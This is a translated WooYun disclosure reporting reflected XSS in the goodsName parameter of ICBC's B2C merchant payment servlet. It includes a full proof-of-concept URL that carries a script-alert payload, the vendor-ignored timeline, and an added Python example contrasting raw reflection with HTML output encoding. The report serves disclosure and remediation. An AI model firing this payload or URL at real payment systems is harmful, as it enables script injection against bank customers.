Vulnerability summary
Defect ID: wooyun-2010-0888
Title: XSS weakness in the ICBC B2C merchant payment service
Vendor: Industrial and Commercial Bank of China (ICBC)
Author: Liscker
Submitted: 2010-11-30 10:48
Fix time: 2010-11-30 11:04
Published: 2010-11-30 11:04
Vulnerability type: XSS (cross-site scripting)
Severity: Low
Self-assessed Rank: 5
Status: vendor could not be contacted, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2010-11-30: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2010-11-30: Vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
XSS weakness in the ICBC B2C merchant payment service
Detailed description:
The goodsName parameter is vulnerable to XSS: its value is reflected into the response page.
Note that when the payment form is submitted, the time data it carries must fall within the valid time window, otherwise the request is rejected before the page is rendered.
Proof of concept:
https://b2c.icbc.com.cn:443/servlet/ICBCINBSEBusinessServlet?merSignMsg=UwETHemn%2BZGtDXH1Shr1AhsuLznAGP6ze6%2F77rH4aKxtKezJ0PB1zEZrUXnD0wfrfQYPpOhJt7rQD6kb647jhNZgTYzXQTXcfAlhotA0w2ZSU5rS74%2B0iEqRiDmVxi49oyAh7OdEdkxCRbf8S6omNUyc89ZfRONrQubahnPZn3A%3D&merCert=MIICdDCCAd2gAwIBAgIKYULKEHrkACKn7jANBgkqhkiG9w0BAQUFADAnMQ8wDQYDVQQDEwZJY2JjQ0ExFDASBgNVBAoTC2ljYmMuY29tLmNuMB4XDTA5MTAxMDA2MjkzOFoXDTEwMTAxMDA2MjkzOFowPzEYMBYGA1UEAxMPeWVlcGF5MDEuZS40MDAwMQ0wCwYDVQQLEwQ0MDAwMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAvZa1tzLFf%2FRM9zSdy8nBoBNG0RI92Zdh0vplLlhPKiNwXFFtGuI0FGF9yD5CBZ6z2aH5piKQ15g%2F6vXmq4RoOsQAybA0e2FkE%2FHqYuDXZAlWgbKTKRFK9zW%2FR0OTxOQF2OSQIvaf1Q%2BYsoB%2BqqigzaHa5xdHhWPGLwvCooYskKsCAwEAAaOBjjCBizAfBgNVHSMEGDAWgBSnYiqG%2BrfWgZuFTNlkSGERswvHmjBJBgNVHR8EQjBAMD6gPKA6pDgwNjEQMA4GA1UEAxMHY3JsMjI3MjEMMAoGA1UECxMDY3JsMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjAdBgNVHQ4EFgQUYDHjjT5kEx5CGbr34mwt7tubemowDQYJKoZIhvcNAQEFBQADgYEAhSHwxlCt3AYzO8O90bEHyPWtbucVOv%2FjTxKxFpaldRc20lkctKSOjSXpiy0%2FKTX4aJ7XC1QZO0pRTPjVxmlm%2BH64ZEFK23%2BgZQYX5EFKHJ8n6pMsVo%2Fg2YNRRm6lQtTqIU2dM1D9jV3Pxh5HmGtOwbXXKYTwE5GhPvaUI0x8xr8%3D&remark1=0&remark2=0&interfaceName=ICBC_PERBANK_B2C&interfaceVersion=1.0.0.0&orderid=352999184&amount=1232300&curType=001&merID=4000EC23359695&merAcct=4000021129200895575&verifyJoinFlag=0&notifyType=HS&merURL=http%3A%2F%2Fbank.test.com&resultType=0&orderDate=20100921153305&goodsName=%3Cscript%3Ealert%28/1980/%29%3C/script%3E
Fix suggestion:
Filter (sanitize and encode) the input before it is rendered.
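As an added illustration of the reflected goodsName value and of the suggested fix (this code is not part of the report and not ICBC's own; the page template, function names and the shortened query string are assumptions), the following extracts goodsName from a constructed copy of the proof-of-concept URL and renders it the vulnerable way and the output-encoded way:

```python
# Added example, not from the WooYun report or the vendor's code base.
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample: a shortened copy of the report's PoC query string.
# Signature and certificate parameters are omitted; values are not real.
POC_URL = (
    "https://b2c.icbc.com.cn:443/servlet/ICBCINBSEBusinessServlet"
    "?interfaceName=ICBC_PERBANK_B2C&orderid=352999184&amount=1232300"
    "&orderDate=20100921153305"
    "&goodsName=%3Cscript%3Ealert%28/1980/%29%3C/script%3E"
)


def goods_name_from(url: str) -> str:
    """Return the percent-decoded goodsName parameter ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("goodsName", [""])[0]


def render_vulnerable(goods_name: str) -> str:
    """Reflects the merchant-supplied value verbatim into the HTML body.

    This is the behaviour the report describes: a value containing
    '<script>' is returned to the browser as live markup.
    """
    return f"<td>Goods: {goods_name}</td>"  # assumed page template


def render_hardened(goods_name: str) -> str:
    """Output-encodes for an HTML text context: '<', '>', '&', quotes
    become entities, so the value is displayed rather than executed."""
    return f"<td>Goods: {html.escape(goods_name, quote=True)}</td>"


def contains_markup(value: str) -> bool:
    """Server-side sanity check a merchant gateway can log or reject on:
    a goods name has no business containing tag or quote characters."""
    return any(ch in value for ch in "<>\"'")


if __name__ == "__main__":
    name = goods_name_from(POC_URL)
    print("decoded goodsName:", name)
    print("vulnerable:", render_vulnerable(name))
    print("hardened:  ", render_hardened(name))
    print("flagged:   ", contains_markup(name))
```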
Copyright notice: please credit the source, Liscker@乌云, when reposting.
Vulnerability response
Vendor response:
Vendor could not be contacted, or vendor actively refused the report
Vulnerability Rank: 8 (WooYun rating)